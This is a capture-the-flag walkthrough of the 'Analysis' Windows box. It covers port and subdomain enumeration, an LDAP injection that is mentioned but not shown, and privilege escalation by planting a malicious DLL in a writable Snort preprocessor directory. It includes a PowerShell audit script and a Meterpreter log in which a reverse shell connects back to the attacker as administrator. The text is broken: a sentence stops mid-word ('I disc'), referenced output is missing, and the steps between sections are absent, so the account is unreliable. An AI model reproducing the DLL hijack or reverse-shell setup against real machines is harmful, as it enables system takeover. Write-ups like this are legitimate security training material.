Analysis

A Windows machine with an unintended privilege escalation

Enumeration

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ nmap -sC -sV -Pn 10.10.11.250
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-21 20:14 EST
Nmap scan report for analysis.htb (10.10.11.250)
Host is up (0.69s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
| http-server-header: 
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-22 01:14:26Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3306/tcp open  mysql         MySQL (unauthorized)
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -2s
| smb2-time: 
|   date: 2024-01-22T01:14:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.58 seconds

DNS and HTTP both exposed is a good combination for subdomain fuzzing: the DNS server on 53 can reveal virtual hosts that the web server on 80 answers to.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ gobuster dns -d analysis.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     analysis.htb
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2024/01/21 20:18:24 Starting gobuster in DNS enumeration mode
===============================================================
Found: internal.analysis.htb

Loading http://internal.analysis.htb returns a 403 Forbidden, so the next step is brute-forcing directories and file names.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ ffuf -u http://internal.analysis.htb/users/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://internal.analysis.htb/users/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 17, Words: 2, Lines: 1, Duration: 98ms]
    * FUZZ: list.php

[Status: 200, Size: 17, Words: 2, Lines: 1, Duration: 5ms]
    * FUZZ: List.php

Visiting list.php returns a "missing parameter" message; supplying a valid name in the name parameter returns results.

Judging from these columns, the name parameter appears to be susceptible to LDAP injection.

After a long while, I disc

Privilege Escalation (Unintended)

We can perform DLL hijacking because we have write permission on the C:\Snort\lib\snort_dynamicpreprocessor directory, which Snort loads its dynamic preprocessors from.

According to snort.conf, located in C:\Snort\etc\, the dynamic module paths are defined as follows:

###################################################
# Step #4: Configure dynamic loaded libraries.  
# For more information, see Snort Manual, Configuring Snort - Dynamic Modules
###################################################

# path to dynamic preprocessor libraries
dynamicpreprocessor directory C:\Snort\lib\snort_dynamicpreprocessor

# path to base preprocessor engine
dynamicengine C:\Snort\lib\snort_dynamicengine\sf_engine.dll

# path to dynamic rules libraries
# dynamicdetection directory C:\Snort\lib\snort_dynamicrules

We can tell that Snort is being restarted at intervals because the Snort log keeps getting updated.

Therefore, we can drop our malicious DLL, named sf_engine.dll here, into C:\Snort\lib\snort_dynamicpreprocessor. Because the dynamicpreprocessor directory directive makes Snort load every DLL found in that directory, the file name does not have to match an existing module.
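The checks behind the three steps above (which paths snort.conf actually loads from, whether the current user can write to them, and whether Snort really restarts), as an added PowerShell example that is not part of the original writeup or of Snort. It assumes Snort 2.9-style snort.conf syntax and the default C:\Snort paths shown above; the script name and the probe-file name are illustrative.

```powershell
# Added example, not part of the original writeup or of Snort. It reads the
# dynamic-module directives from snort.conf, then tests which of the resulting
# load locations the current (low-privileged) user can actually write to.
# Assumed: Snort 2.9 snort.conf syntax and the default paths shown in the writeup.
param(
    [string]$ConfPath = 'C:\Snort\etc\snort.conf'
)

function Get-SnortLoadPaths {
    # One object per dynamicengine / dynamicpreprocessor / dynamicdetection directive.
    # "directory" form: Snort loads every DLL in the directory.
    # Bare or "file" form: Snort loads that one DLL.
    param([string]$Conf)
    foreach ($raw in Get-Content -LiteralPath $Conf) {
        $line = $raw.Trim()
        if ($line -eq '' -or $line.StartsWith('#')) { continue }   # commented-out directives do not load
        if ($line -match '^(dynamicengine|dynamicpreprocessor|dynamicdetection)\s+(?:(file|directory)\s+)?(.+)$') {
            $kind = 'file'
            if ($Matches[2] -eq 'directory') { $kind = 'directory' }
            [pscustomobject]@{
                Directive = $Matches[1]
                Kind      = $kind
                Path      = $Matches[3].Trim()
            }
        }
    }
}

function Test-DirectoryWritable {
    # Probe by creating a real file. Reading ACEs with Get-Acl is easy to get wrong
    # (inheritance, deny entries, nested groups); an actual write is definitive.
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ('probe_{0}.tmp' -f [guid]::NewGuid().ToString('N'))
    try {
        [IO.File]::WriteAllText($probe, 'x')
    } catch {
        return $false
    }
    Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue   # clean up the probe
    return $true
}

function Watch-SnortRestarts {
    # Reports every new snort.exe PID for $Seconds. The writeup infers restarts from the
    # log's timestamps; a changing PID is the same evidence without needing the log path.
    param([int]$Seconds = 300, [int]$Interval = 5)
    $seen = @{}
    $deadline = (Get-Date).AddSeconds($Seconds)
    while ((Get-Date) -lt $deadline) {
        foreach ($proc in Get-Process -Name snort -ErrorAction SilentlyContinue) {
            if (-not $seen.ContainsKey($proc.Id)) {
                $seen[$proc.Id] = $true
                '{0:HH:mm:ss} snort.exe running as PID {1}' -f (Get-Date), $proc.Id
            }
        }
        Start-Sleep -Seconds $Interval
    }
}

$report = foreach ($p in Get-SnortLoadPaths -Conf $ConfPath) {
    # For a single-file directive the interesting question is still the parent
    # directory: a writable directory lets you swap out the named DLL between restarts.
    $dir = $p.Path
    if ($p.Kind -ne 'directory') { $dir = Split-Path -Path $p.Path -Parent }
    [pscustomobject]@{
        Directive   = $p.Directive
        Kind        = $p.Kind
        Path        = $p.Path
        DirWritable = Test-DirectoryWritable -Dir $dir
    }
}
$report | Format-Table -AutoSize

# A writable "directory" entry is the dangerous case: any DLL dropped there runs its
# DllMain inside snort.exe on the next start, with that process's privileges.
# Remediation (run as an administrator) is to take write access away from standard users:
#   icacls C:\Snort\lib\snort_dynamicpreprocessor /inheritance:r /grant:r "Administrators:(OI)(CI)F" "SYSTEM:(OI)(CI)F" "Users:(OI)(CI)RX"
```

Paste the script into the Evil-WinRM session (or upload it under a name of your choosing and dot-source it), then call Watch-SnortRestarts for a few minutes before planting anything: a DLL in a writable load directory only pays off if something privileged starts Snort again, and the PID output tells you how often that happens.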

After uploading our malicious DLL to the directory and running Snort with the config file listed above, we see that our DLL is loaded, but sadly we get no shell.

Evil-WinRM* PS C:\Snort\bin> ./snort.exe -c C:\Snort\etc\snort.conf
snort.exe : Running in IDS mode
    + CategoryInfo          : NotSpecified: (Running in IDS mode:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
        --== Initializing Snort ==--
Initializing Output Plugins!
Initializing Preprocessors!
Initializing Plug-ins!
Parsing Rules file "C:\Snort\etc\snort.conf"
PortVar 'HTTP_PORTS' defined :  [ 80:81 311 383 591 593 901 1220 1414 1741 1830 2301 2381 2809 3037 3128 3702 4343 4848 5250 6988 7000:7001 7144:7145 7510 7777 7779 8000 8008 8014 8028 8080 8085 8088 8090 8118 8123 8180:8181 8243 8280 8300 8800 8888 8899 9000 9060 9080 9090:9091 9443 9999 11371 34443:34444 41080 50002 55555 ]
PortVar 'SHELLCODE_PORTS' defined :  [ 0:79 81:65535 ]
PortVar 'ORACLE_PORTS' defined :  [ 1024:65535 ]
PortVar 'SSH_PORTS' defined :  [ 22 ]
PortVar 'FTP_PORTS' defined :  [ 21 2100 3535 ]
PortVar 'SIP_PORTS' defined :  [ 5060:5061 5600 ]
PortVar 'FILE_DATA_PORTS' defined :  [ 80:81 110 143 311 383 591 593 901 1220 1414 1741 1830 2301 2381 2809 3037 3128 3702 4343 4848 5250 6988 7000:7001 7144:7145 7510 7777 7779 8000 8008 8014 8028 8080 8085 8088 8090 8118 8123 8180:8181 8243 8280 8300 8800 8888 8899 9000 9060 9080 9090:9091 9443 9999 11371 34443:34444 41080 50002 55555 ]
PortVar 'GTP_PORTS' defined :  [ 2123 2152 3386 ]
Detection:
   Search-Method = AC-Full-Q
    Split Any/Any group = enabled
    Search-Method-Optimizations = enabled
    Maximum pattern length = 20
Tagged Packet Limit: 256
Loading dynamic engine C:\Snort\lib\snort_dynamicengine\sf_engine.dll... done
Loading all dynamic preprocessor libs from C:\Snort\lib\snort_dynamicpreprocessor...
  Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dce2.dll... done
  Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dnp3.dll... done
  Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dns.dll... done
  Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_engine.dll...

However, after a while, my Meterpreter listener manages to catch a privileged shell, presumably from the Administrator running the batch script to restart Snort.

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.36:4444 
[*] Sending stage (200774 bytes) to 10.10.11.250
[*] Meterpreter session 1 opened (10.10.14.36:4444 -> 10.10.11.250:65304) at 2024-01-21 19:59:11 -0500

meterpreter > shell
Process 15708 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
analysis\administrateur
